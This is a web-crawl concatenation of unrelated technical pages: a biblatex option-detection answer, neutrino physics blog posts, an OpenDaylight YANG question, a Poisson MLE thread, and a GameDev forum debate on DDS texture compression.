\let\abx@aux@count\@gobbletwo
\let\abx@aux@fncount\@gobbletwo}
Then, what can I use to know whether the option was enabled?
For example:
\usepackage[style=abnt,language=english,citecounter=false]{biblatex}
\if citecounter=false
\message{Citecounter is false^^J}
\else
\message{Citecounter is enabled^^J}
\fi
Related:
The quoted definition shows that \blx@citecounter is equal to \relax if and only if the citecounter feature is deactivated. So you can check for that.
One way would be
\ifcsvoid{blx@citecounter}
{NO CITECOUNTER}
{CITECOUNTER}
(Technically, \ifcsvoid{blx@citecounter} tests if \blx@citecounter is \relax or a parameterless macro with empty replacement, but that should be good enough here.)
If you want to stick to TeX conditionals
\makeatletter
\ifx\blx@citecounter\relax
NO CITECOUNTER%
\else
CITECOUNTER%
\fi
\makeatother
would also work.
In addition to citecounter, I can also check whether backref was set too. Given the source for the backref option on biblatex package:
\DeclareBibliographyOption[boolean]{backref}[true]{%
\ifstrequal{#1}{true}
\let\abx@aux@backref\blx@aux@backref
\booltrue{backtracker}}
{\let\blx@backref\@gobble
\let\abx@aux@backref\@gobblefive
\boolfalse{backtracker}}}
I can check whether both citetracker and backref were set with:
\usepackage[style=abnt,language=english,backend=biber,citecounter=true]{biblatex}
\makeatletter
\ifx\blx@citecounter\relax
\message{citecounter defined!^^J}
\else
\message{citecounter not defined!^^J}
\fi
\makeatother
\ifcitetracker
\message{citetracker defined!^^J}
\else
\message{citetracker not defined!^^J}
\fi
\ifbacktracker
\message{backref defined!^^J}
\else
\message{backref not defined!^^J}
\fi
• Note that the citetracker bool as tested with \ifcitetracker is activated by several options (citecounter being one of them) and need not mean that the tracking option citetracker has been enabled. – moewe Apr 8 at 7:05 | 2019-10-20 07:02:39 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8649119734764099, "perplexity": 6562.44856389449}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-43/segments/1570986703625.46/warc/CC-MAIN-20191020053545-20191020081045-00164.warc.gz"} |
https://thespectrumofriemannium.wordpress.com/tag/right-handed-neutrinos/ | # LOG#126. Basic Neutrinology(XI).
Why is the case of massive neutrinos so relevant in contemporary physics? The full answer to this question would be very long. In fact, I am making this long thread about neutrinology in order you understand it a little bit. If neutrinos do have nonzero masses, then, due to the basic postulates of the quantum theory there will be in a “linear combination” or “mixing” among all the possible “states”. It also happens with quarks! This mixing will be observable even at macroscopic distances from the production point or source and it has very important practical consequences ONLY if the difference of the neutrino masses squared are very small. Mathematically speaking $\Delta m_{ij}^2=m_i^2-m_j^2$. Typically, $\Delta m_{ij}\leq 1eV$, but some “subtle details” can increae this upper bound up to the keV scale (in the case of sterile or right-handed neutrinos, undetected till now).
In the presence of neutrino masses, the so-called “weak eigenstates” are different to “mass eigenstates”. There is a “transformation” or “mixing”/”oscillation” between them. This phenomenon is described by some unitary matrix U. The idea is:
$\mbox{Neutrino masses}\neq 0\longrightarrow \mbox{Transitions between neutrino mass eigenstates}$
$\mbox{Transitions between mass eigenstates}\longrightarrow \mbox{Neutrino mixing matrix}$
$\mbox{Neutrino mixing matrix}\longrightarrow \mbox{Neutrino oscillations}$
If neutrinos can only be created and detected as a result of weak processes, at origin (or any arbitrary point) we have a weak eigenstate as a “rotation” of a mass eigenstate through the mixing matrix U:
$\boxed{\vert \nu_w (0)\rangle =U\vert \nu_m (0)\rangle}$
In this post, I am only to introduce the elementary theory of neutrino oscillations (NO or NOCILLA)/neutrino mixing (NOMIX) from a purely heuristic viewpoint. I will be using natural units with $\hbar=c=1$.
If we ignore the effects of the neutrino spin, after some time the system will evolve into the next state (recall we use elementary hamiltonian evolution from quantum mechanics here):
$\vert \nu_m (t)\rangle=\exp \left( -iHt\right)\vert \nu_m (t)\rangle$
and where $H$ is the free hamiltonian of the system, i.e., in vacuum. It will be characterized by certain eigenvalues
$H=\mbox{diag}(\ldots,E_i,\ldots)$
and here, using special relativity, we write $E_i^2=p_i^2+m_i^2$
In most of the interesting cases (when $E\sim MeV$ and $m\sim eV$), this relativistic dispersion relationship $E=E(p,m)$ can be approximated by the next expression (it is the celebrated “ultra-relativistic” approximation):
$p\simeq E$
$E\simeq p+\dfrac{m^2}{2p}$
The effective neutrino hamiltonian can be written as
$H_{eff}=\mbox{diag}(\ldots,m_i^2,\ldots)/2E$
and
$\vert \nu_m (t)\rangle=U\exp \left(-iH_{eff}t\right)U^+\vert \nu_w (0)\rangle=\exp \left(-iH_w^{eff}t\right)\vert \nu_m (0)\rangle$
In this last equation, we write
$H_w^{eff}\equiv \simeq \dfrac{M^2}{2E}$
with
$M\equiv U\mbox{diag}\left(\ldots,m_i^2,\ldots\right)U^+$
We can perform this derivation in a more rigorous mathematical structure, but I am not going to do it here today. The resulting theory of neutrino mixing and neutrino oscillations (NO) has a beautiful corresponded with Neutrino OScillation EXperiments (NOSEX). These experiments are usually analyzed under the simplest assumption of two flavor mixing, or equivalently, under the perspective of neutrino oscillations with 2 simple neutrino species we can understand this process better. In such a case, the neutrino mixing matrix U becomes a simple 2-dimensional orthogonal rotation matrix depending on a single parameter $\theta$, the oscillation angle. If we repeat all the computations above in this simple case, we find that the probability that a weak interaction eigenstate neutrino $\vert \nu_w\rangle$ has oscillated to other weak interaction eigenstate, say $\vert \nu_w'\rangle$ when the neutrino travels some distance $l=ct$ (remember we are supposing the neutrino are “almost” massless, so they move very close to the speed of light) is, taking $\nu_m=\nu_e$ and $\nu_m'=\nu_\mu$,
(1) $\boxed{P(\nu_e\longrightarrow \nu_\mu;l)=\sin^22\theta\sin^2\left(\dfrac{l}{l_{osc}}\right)}$
This important formula describes the probability of NO in the 2-flavor case. It is a very important and useful result! There, we have defined the oscillation length as
$\dfrac{1}{l_{osc}}\equiv\dfrac{\Delta m^2 l}{4E}$
with $\Delta m^2=m_1^2-m_2^2$. In practical units, we have
(2) $\boxed{\dfrac{1}{l_{osc}}=\dfrac{\Delta m^2 l}{4E}\simeq 1.27\dfrac{\Delta m^2(eV^2)l(m)}{E(MeV)}=1.27\dfrac{\Delta m^2(eV^2)l(km)}{E(GeV)}}$
As you can observe, the probabilities depend on two factors: the mixing (oscillation) angle and the kinematical factor as a function of the traveled distance, the momentum of the neutrinos and the mass difference between the two species. If this mass difference were probed to be non-existent, the phenomenon of the neutrino oscillation would not be possible (it would have 0 probability!). To observe the neutrino oscillation, we have to make (observe) neutrinos in which some of this parameters are “big”, so the probability is significant. Interestingly, we can have different kind of neutrino oscillation experiments according to how large are these parameters. Namely:
Long baseline experiments (LBE). This class of NOSEX happen whenever you have an oscillation length of order $l\sim 10^{2}km$ or bigger. Even, the neutrino oscillations of solar neutrinos (neutrinos emitted by the sun) and other astrophysical sources can also be understood as one of this. Neutrino beam experiments belong to this category as well.
-Short baseline experiments (SBE). This class of NOSEX happen whenever the distances than neutrino travel are lesser than hundreds of kilometers, perhaps some. Of course, the issue is conventional. Reactor experiments like KamLAND in Japan (Daya Bay in China, or RENO in South Korea) are experiments of this type.
Moreover, beyond reactor experiments, you also have neutrino beam experiments (T2K, $NO\nu A$, OPERA,…). Neutrino telescopes or detectors like IceCube are the next generation of neutrino “observers” after SuperKamiokande (SuperKamiokande will become HyperKamiokande in the near future, stay tuned!).
In summary, the phenomenon of neutrino mixing/neutrino oscillations/changing neutrino flavor transforms the neutrino in a very special particle under quantum and relativistic theories. Neutrinos are one of the best tools or probes to study matter since they only interact under weak interactions and gravity! Therefore, neutrinos are a powerful “laboratory” in which we can test or search for new physics (The fact that neutrinos are massive is, said this, a proof of new physics beyond the SM since the SM neutrinos are massless!). Indeed, the phenomenon is purely quantum and (special) relativist since the neutrinos are tiny particles and “very fast”. We have seen what are the main ideas behind this phenomenon and the main classes of neutrino experiments (long baseline and shortbaseline experiments). Moreover, we also have “passive” neutrino detectors like SuperKamiokande, IceCube and many others I will not quote here. They study the neutrino oscillations detecting atmospheric neutrinos (the result of cosmic rays hitting the atmosphere), solar neutrinos and other astrophysical sources of neutrinos (like supernovae!). I have talked you about cosmic relic neutrinos too in the previous post. Aren’t you convinced that neutrinos are cool? They are “metamorphic”, they have flavor, they are everywhere!
See you in my next neutrinological post!
# LOG#124. Basic Neutrinology(IX).
In supersymmetric LR models, inflation, baryogenesis (and/or leptogenesis) and neutrino oscillations can be closely related to each other. Baryosynthesis in GUTs is, in general, inconsistent with inflationary scenarios. The exponential expansion during the inflationary phase will wash out any baryon asymmetry generated previously by any GUT scale in your theory. One argument against this feature is the next idea: you can indeed generate the baryon or lepton asymmetry during the process of reheating at the end of inflation. This is a quite non-trivial mechanism. In this case, the physics of the “fundamental” scalar field that drives inflation, the so-called inflaton, would have to violate the CP symmetry, just as we know that weak interactions do! The challenge of any baryosynthesis model is to predict the observed asymmetry. It is generally written as a baryon to photon (in fact, a number of entropy) ratio. Tha baryon asymmetry is defined as
$\dfrac{n_B}{s}\equiv \dfrac{(n_b-n_{\bar{b}})}{s}$
At present time, there is only matter and only a very tiny (if any) amount of antimatter, and then $n_{\bar{b}}\sim 0$. The entropy density s is completely dominated by the contribution of relativistic particles so it is proportional to the photon number density. This number is calculated from CMBR measurements, and it shows to be about $s=7.05n_\gamma$. Thus,
$\dfrac{n_B}{s}\propto \dfrac{n_b}{n_\gamma}$
From BBN, we know that
$\dfrac{n_B}{n_\gamma}=(5.1\pm 0.3)\cdot 10^{-10}$
and
$\dfrac{n_B}{s}=(7.2\pm 0.4)\cdot 10^{-11}$
This value allows to obtain the observed lepton asymmetry ratio with analogue reasoning.
By the other hand, it has been shown that the “hybrid inflation” scenarios can be successfully realized in certain SUSY LR models with gauge groups
$G_{SUSY}\supset G_{PS}=SU(4)_c\times SU(2)_L\times SU(2)_R$
after SUSY symmetry breaking. This group is sometimes called the Pati-Salam group. The inflaton sector of this model is formed by two complex scalar fields $H,\theta$. At the end of the inflation do oscillate close to the SUSY minimum and respectively, they decay into a part of right-handed sneutrinos $\nu_i^c$ and neutrinos. Moreover, a primordial lepton asymmetry is generated by the decay of the superfield $\nu_2^c$ emerging as the decay product of the inflaton field. The superfield $\nu_2^c$ also decays into electroweak Higgs particles and (anti)lepton superfields. This lepton asymmetry is partially converted into baryon asymmetry by some non-perturbative sphalerons!
Remark: (Sphalerons). From the wikipedia entry we read that a sphaleron (Greek: σφαλερός “weak, dangerous”) is a static (time independent) solution to the electroweak field equations of the SM of particle physics, and it is involved in processes that violate baryon and lepton number.Such processes cannot be represented by Feynman graphs, and are therefore called non-perturbative effects in the electroweak theory (untested prediction right now). Geometrically, a sphaleron is simply a saddle point of the electroweak potential energy (in the infinite dimensional field space), much like the saddle point of the surface $z(x,y)=x^2-y^2$ in three dimensional analytic geometry. In the standard model, processes violating baryon number convert three baryons to three antileptons, and related processes. This violates conservation of baryon number and lepton number, but the difference B-L is conserved. In fact, a sphaleron may convert baryons to anti-leptons and anti-baryons to leptons, and hence a quark may be converted to 2 anti-quarks and an anti-lepton, and an anti-quark may be converted to 2 quarks and a lepton. A sphaleron is similar to the midpoint($\tau=0$) of the instanton , so it is non-perturbative . This means that under normal conditions sphalerons are unobservably rare. However, they would have been more common at the higher temperatures of the early Universe.
The resulting lepton asymmetry can be written as a function of a number of parameters among them the neutrino masses and the mixing angles, and finally, this result can be compared with the observational constraints above in baryon asymmetry. However, this topic is highly non-trivial. It is not trivial that solutions satisfying the constraints above and other physical requirements can be found with natural values of the model parameters. In particular, it is shown that the value of the neutrino masses and the neutrino mixing angles which predict sensible values for the baryon or lepton asymmetry turn out to be also consistent with values require to solve the solar neutrino problem we have mentioned in this thread. | 2017-06-28 12:21:43 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 45, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8914327621459961, "perplexity": 745.4675135261574}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-26/segments/1498128323680.18/warc/CC-MAIN-20170628120308-20170628140308-00458.warc.gz"} |
https://ask.opendaylight.org/question/4892/how-do-i-augment-an-experimenter-meter-band/ | # How do I augment an experimenter meter band?
I'm looking to augment the meter-band-experimenter in Lithium (released version). I found a reference on how to do this for actions though it appears be out of date (Openflow Protocol Library extensibility). The reason I say that is that the imports don't appear to be valid anymore.
I've tried the following:
import opendaylight-meter-types {
prefix meter;
}
identity my-meter-band {
base meter:meter-band;
}
Compiling that I do see the Java subclass of MeterBand created. I used that as the action example appears to use the base type. Perhaps I should be using meter:meter-band-experimenter here.
It is not clear how the string following the keyword augment keyword was derived in the referenced action augmentation (though again, it looks like those referenced YANG files are out-of-date).
I want to do something like:
augment "/meter:?what here?" {
ext:augment-identifier "my-exp-meter-band";
leaf my-value {
type uint16;
}
}
Any idea on:
1. What to use as the base (meter-band or meter-band-experimenter or something else)?
2. What magic string to put after the augment keyword?
3. Does this has any chance of working (e.g. known not to be supported in Lithium)?
4. Are there any examples of this that I missed out there?
I know that next-steps are to add a serializer/deserializer as shown in the referenced document. When I get the meter config currently for the band that needs to be augmented, I'm seeing the error below so at least it looks promising. If one of the maintainers is looking, note the typo below ("ale" instead of "are"):
2015-08-18 17:02:20,420 | WARN | entLoopGroup-8-2 | OFDecoder | 175 - org.opendaylight.openflowjava.openflow-protocol-impl - 0.6.0.Lithium | Message deserialization failed
edit retag close merge delete
Sort by » oldest newest most voted
It seems I've meandered into uncharted territory. This facility is not elaborated in the Lithium release. Will look at what it takes to do so.
more | 2019-06-27 10:29:49 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.17978985607624054, "perplexity": 3849.390516040892}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-26/segments/1560628001089.83/warc/CC-MAIN-20190627095649-20190627121649-00215.warc.gz"} |
http://mathhelpforum.com/advanced-statistics/116305-find-asympto-distribution-mle.html | # Thread: find asympto. distribution of MLE
1. ## find asympto. distribution of MLE
give me a path to do the last part
2. I get for the log likelihood function
$\ln L=-n\ln(1-e^{-\lambda})-n\lambda+\sum X_i\ln\lambda-\ln(\prod (X_i!))$
The derivative wrt lambda is
${-ne^{-\lambda} \over 1-e^{-\lambda}}-n+{\sum X_i\over \lambda}$
set this equal to zero and divide by n ...
${\bar X\over \lambda}={1 \over 1-e^{-\lambda}}$
I don't think we can find the MLE of $\lambda$ say $\hat \lambda$
But I don't think they want you to either. | 2017-04-24 10:34:31 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 5, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9004802703857422, "perplexity": 932.7439067663814}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-17/segments/1492917119225.38/warc/CC-MAIN-20170423031159-00320-ip-10-145-167-34.ec2.internal.warc.gz"} |
https://www.gamedev.net/forums/topic/506247-why-do-game-companies-use-custom-texture-formats-instead-of-the-dds-format/?page=3 | # Why do game companies use custom texture formats instead of the DDS format?
## Recommended Posts
Numsgil 501
Quote:
Original post by Yann L
Quote:
I would argue a different way: DXT let's you use higher resolution textures with the same file size as a smaller resolution model. That is, if I use DXT5, I can use a 1024x1024 image where a 512x512 image was before, without any additional costs in terms of performance or VRAM.
Not entirely correct. Texture fetch latency and caching behaviour will be (slightly) affected, and due to more mipmap levels you'll inevitably increase memory usage (assuming DXT5).
How so? If the compressed, but larger resolution texture is the same size in memory as an uncompressed, smaller version. Also, I don't think it'll increase memory usage even counting the mip map levels (compared with an uncompressed but smaller texture + its mip maps). Or if it does, it's like 4 bytes for the one extra level :)
Quote:
However, this was not my point. When you design your game and all artwork assets, you define a common lowest denominator for it to work on. Say you target 512MB VRAM class hardware. You will choose your resolutions and compression settings so to avoid (too much) swapping on such a card. Now, imagine some user buying a new 1GB VRAM card. Essentially, since your game was designed with 512MB in mind, half of his memory will be unused and the textures will look the same as on a 512MB card. Mr.NewCardOwner will not be happy.
In your scenario you're doing exactly what I'm saying. You're essentially designing your game with imaginary future tech cards in mind, with large texture sizes, and allowing current lowest denominator cards to run by compressing the textures.
Quote:
Quote:
Probably the optimal version would let the artists specify an optional compression format in an options file for every texture.
I wouldn't trust an average artist to handle that [wink]
Really? Is it that you're afraid the artists won't ever choose the compression because they don't want their art to have artifacts?
Quote:
If you think like that, then why not consider JPEG instead ? It's going to be smaller, after all. Of course there's the JPEG->DXTC transcoding, which would suck. But seriously, while the texture loading is HDD limited, it only makes a small percentage of the overall loading time of a scene.
What else are you doing in your scene? The time it takes to dump stuff (textures, models, etc.) from disk to GPU should be the bottleneck. If other stuff is slowing your loading times down, I can't help but feel you're doing something wrong. I can't imagine anything CPU intensive that should be going on during level load (except things like uncompressing from disk to make up for poor hard drive speeds). And probably random properties I guess. If you have 1000 monsters that start with random positions, that might take a while. But most games aren't like that.
Quote:
I just can't understand how people can store their assets in a format that was never meant to be a lossy image storage format. It was designed as a compression with a GPU-friendly decoding process. It is good at doing this for now, but why use it for something where other, better alternatives exist ?
If you're storing textures on disk, you probably want to avoid JPG because it's the worst of both worlds: artifacts and uncompressed in VRAM (or worse, you're DXT compressing the JPG, adding artifacts to artifacts). That leaves lossless, where PNG is king. Or hardware accelerated lossy, where DDS makes the most sense, since it natively supports it. Or roll your own, of course, that could support either.
If/when they invent hardware accelerated JPG and PNG compression, I will totally jump on that bandwagon. But I would still probably be using a DDS format: Microsoft would probably invent some new DDS mode that lets you store as JPG or PNG compression to keep DDS current. Compression aside, DDS is the best general purpose texture format, because it's the only one specifically developed with game hardware in mind.
##### Share on other sites
Yann L 1802
Quote:
Original post by NumsgilHow so? If the compressed, but larger resolution texture is the same size in memory as an uncompressed, smaller version. Also, I don't think it'll increase memory usage even counting the mip map levels (compared with an uncompressed but smaller texture + its mip maps). Or if it does, it's like 4 bytes for the one extra level :)
Sure, the difference is small - but saying that it is the same would be incorrect. Nitpicking, I admit ;) However, the increase of memory footprint on the cache is very much noticeable, since texture cache usually operates on decoded values.
Quote:
Original post by NumsgilIn your scenario you're doing exactly what I'm saying. You're essentially designing your game with imaginary future tech cards in mind, with large texture sizes, and allowing current lowest denominator cards to run by compressing the textures.
So ? Set aside that such cards aren't imaginary (but haven't yet reached the required market penetration for the target audience), my approach can seamlessly improve texture quality on such cards. Yours cannot without shipping a new texture pack.
Quote:
Really? Is it that you're afraid the artists won't ever choose the compression because they don't want their art to have artifacts?
Amongst others, that is a factor. Another one is that artists may not understand all technical implications of such a choice. We usually try to limit the options of our artists to 'art thingies' only.
Quote:
What else are you doing in your scene? The time it takes to dump stuff (textures, models, etc.) from disk to GPU should be the bottleneck. If other stuff is slowing your loading times down, I can't help but feel you're doing something wrong.
Lol, no, I don't think so ;)
Quote:
I can't imagine anything CPU intensive that should be going on during level load (except things like uncompressing from disk to make up for poor hard drive speeds).
Let's see - transcoding PRT coefficient maps for partially-dynamic global illumination, generating and compiling metashaders, tracing horizon maps, setting up dynamic partitioning systems, uncompressing progressive LOD data, preparing energy transfer volumes for dynamic soft shadows, generating seed and permutation tables for fractal vegetation and clouds, and so on. All this is dependent on the hardware the engine is being run on, in order to smoothly adjust the delicate performance-quality balance to match the players/users hardware and preferences. There's a lot more to a modern 3D engine than 'dumping stuff from disk to GPU'. Now granted, what we do is very high end stuff, and it's not for a game. But most of these techniques also apply to advanced game 3D engines.
Quote:
If/when they invent hardware accelerated JPG and PNG compression, I will totally jump on that bandwagon. But I would still probably be using a DDS format: Microsoft would probably invent some new DDS mode that lets you store as JPG or PNG compression to keep DDS current. Compression aside, DDS is the best general purpose texture format, because it's the only one specifically developed with game hardware in mind.
Let's not slip into religious fanboi-isms, and stay with the facts, shall we ? DDS is definitely not the best general purpose format. DDS isn't even a general purpose format. It is a quite specific format, that suits a certain type of situation, for certain people. Take console development, for example. Using precompressed DDS on XBox makes perfect sense, because your target hardware will never change.
There's nothing wrong with using DDS - but make sure you understand the implications of doing so, that you understand the available alternatives, and that after careful consideration, you have opted that using DDS is in fact the best solution in your situation.
But advocating it as a generalized 'best format', just because you happen to be familiar with it, without taking into account the specific context of usage, is very naive and misleading.
##### Share on other sites
Kest 547
Quote:
Original post by Hodgman
Quote:
Original post by Kest
Quote:
Also, while PNG might well be compressed it is only compressed on disk; DXT compressed images remain compressed in texture ram
Any format can be compressed once its in system ram.
IIRC, DirectX actually has the ability to load a PNG and save it as DDS, or vice versa. Once the texture is in ram, all format bets are off.
^^fixed to show apples and oranges ;)
^^fixed to show apples and oranges ;)
You didn't fix my statement, you modified it. I was referring to texture ram. Once the texture is in video ram, it no longer matters how it was stored on the disk. When, where, and how it gets processed from disk to v-ram doesn't change any of the facts.
##### Share on other sites
frob 44919
Quote:
Original post by Numsgil
Quote:
Really? Is it that you're afraid the artists won't ever choose the compression because they don't want their art to have artifacts?
Amongst others, that is a factor. Another one is that artists may not understand all technical implications of such a choice. We usually try to limit the options of our artists to 'art thingies' only.
Ditto on that.
Sure, artists are able to pick the best format, it isn't that they will lack the skill if you give them the proper training. Some of them will understand the importance of picking the most appropriate format for the technical rather than artistic reasons, even if it reduces the artistic quality or image fidelity from the originals.
But the real problem is consistency.
They're dealing with many hundreds, even potentially several tens of thousands of graphics files over the course of the project. They're working with these files all day, every work day.
Do you honestly expect them to evaluate each file and determine the best format whenever they save their work? Every time they modify a file?
I don't. I expect a tool to do this when it builds and packages all the art assets. Automatic this task saves between hundreds and thousands of hours over the course of the project, depending on the number of artists. It simplifies their workflow, and it also gives better results for the game. Everybody wins.
In fact, we do have tools for this. The tool converts it into all the possible formats, evaluates them based on the resulting image and the data size, and picks the best one based on those results. The art programmers, technical artists, and other qualified people determine the heuristics for evaluating what is the best, allowing us to trade off size, speed, and most importantly image fidelity without sacrificing technical quality.
##### Share on other sites
Numsgil 501
Quote:
Original post by Yann L
Quote:
If/when they invent hardware accelerated JPG and PNG compression, I will totally jump on that bandwagon. But I would still probably be using a DDS format: Microsoft would probably invent some new DDS mode that lets you store as JPG or PNG compression to keep DDS current. Compression aside, DDS is the best general purpose texture format, because it's the only one specifically developed with game hardware in mind.
Let's not slip into religious fanboi-isms, and stay with the facts, shall we ? DDS is definitely not the best general purpose format. DDS isn't even a general purpose format. It is a quite specific format, that suits a certain type of situation, for certain people. Take console development, for example. Using precompressed DDS on XBox makes perfect sense, because your target hardware will never change.
There's nothing wrong with using DDS - but make sure you understand the implications of doing so, that you understand the available alternatives, and that after careful consideration, you have opted that using DDS is in fact the best solution in your situation.
But advocating it as a generalized 'best format', just because you happen to be familiar with it, without taking into account the specific context of usage, is very naive and misleading.
Best for game development I meant :) And not counting whatever you make yourself, of course. And compression aside (yes, that's a rather large aside). Other than compression there's nothing that PNG or TGA or JPG get you above what DDS gets you, while DDS gets you some things beyond PNG et al. Like native support for cubemaps. Sure you could just do a cross in a PNG, but why would you when DDS can natively support it? You know, besides that whole compression thing.
Unless I'm missing something?
##### Share on other sites
Numsgil 501
Quote:
Original post by frob
Quote:
Original post by Numsgil
Quote:
Really? Is it that you're afraid the artists won't ever choose the compression because they don't want their art to have artifacts?
Amongst others, that is a factor. Another one is that artists may not understand all technical implications of such a choice. We usually try to limit the options of our artists to 'art thingies' only.
Ditto on that.
Sure, artists are able to pick the best format, it isn't that they will lack the skill if you give them the proper training. Some of them will understand the importance of picking the most appropriate format for the technical rather than artistic reasons, even if it reduces the artistic quality or image fidelity from the originals.
But the real problem is consistency.
They're dealing with many hundreds, even potentially several tens of thousands of graphics files over the course of the project. They're working with these files all day, every work day.
Do you honestly expect them to evaluate each file and determine the best format whenever they save their work? Every time they modify a file?
I don't. I expect a tool to do this when it builds and packages all the art assets. Automatic this task saves between hundreds and thousands of hours over the course of the project, depending on the number of artists. It simplifies their workflow, and it also gives better results for the game. Everybody wins.
In fact, we do have tools for this. The tool converts it into all the possible formats, evaluates them based on the resulting image and the data size, and picks the best one based on those results. The art programmers, technical artists, and other qualified people determine the heuristics for evaluating what is the best, allowing us to trade off size, speed, and most importantly image fidelity without sacrificing technical quality.
I know this is something of a pipe dream, but seriously, artists should understand the technical implications of their work! This hand holding and coddling for artists that seems to be prevalent makes my stomach turn. At the very least an artists should have a basic grounding in calculus and linear algebra. They should understand the lighting model. They should be able to write their own shaders. They should understand and make decisions about how to use the hardware of video cards. I'm guessing this isn't the way things are simply because there aren't enough artists that can do that, and simple demand and lack of supply is driving the standards.
In a perfect world, I as a programmer would give a max budget to my art team. Do not exceed 160 MB. They would build their level with a mind towards that limit. If there's a far away billboard, they can save MBs by saving it as a DXT1. If there's some grass off in the distance, they might need an alpha channel and opt for DXT3 or 5. If there's a baddy that will be right in front of the player, they can go for a full 32 bits. Something in game counts the total MBs of all assets and gives it as a readback when the artists run the game. The art lead cracks down when some junior artist uses a 1024x1024 32 bit texture for a postage stamp. If render times are too high, they'd load up PerfHud and take a look at the draw commands.
I know that's not reality. I don't know if it's even achievable. Perhaps we should just be thankful when an artist makes something look good, and leave all the technical implications to the programmers.
##### Share on other sites
Zipster 2359
Quote:
Original post by NumsgilI know this is something of a pipe dream, but seriously, artists should understand the technical implications of their work! This hand holding and coddling for artists that seems to be prevalent makes my stomach turn. At the very least an artists should have a basic grounding in calculus and linear algebra. They should understand the lighting model. They should be able to write their own shaders. They should understand and make decisions about how to use the hardware of video cards. I'm guessing this isn't the way things are simply because there aren't enough artists that can do that, and simple demand and lack of supply is driving the standards.
Calculus and linear algebra? Pipe dream indeed ;) But seriously, what you're talking about sounds a lot like a technical artist, and there are plenty of those out there if you know where to look. We just hired one a few weeks ago. They're basically programmers who also have a good understanding of the art side of development as and can use Max, Photoshop, write scripts, shaders, etc. I don't know if I'd trust a full-blown artist to write shaders though. Shaders can truly be time-critical code if you're GPU-bound, and in my experience artists will use every single feature they possibly can to achieve a better visual effect unless you pull back on the reins a bit. We have a running joke in the graphics department whenever we add a new feature, "don't tell the artists!" :P
##### Share on other sites
Kest 547
Logic versus ingenuity. You can favor both equally, be naturally pulled toward one and annoyed with the other, or somewhere in between. To get the best of both worlds, you need at least two people. Or a split personality.
##### Share on other sites
Numsgil 501
Quote:
Original post by Zipster
Quote:
Original post by NumsgilI know this is something of a pipe dream, but seriously, artists should understand the technical implications of their work! This hand holding and coddling for artists that seems to be prevalent makes my stomach turn. At the very least an artists should have a basic grounding in calculus and linear algebra. They should understand the lighting model. They should be able to write their own shaders. They should understand and make decisions about how to use the hardware of video cards. I'm guessing this isn't the way things are simply because there aren't enough artists that can do that, and simple demand and lack of supply is driving the standards.
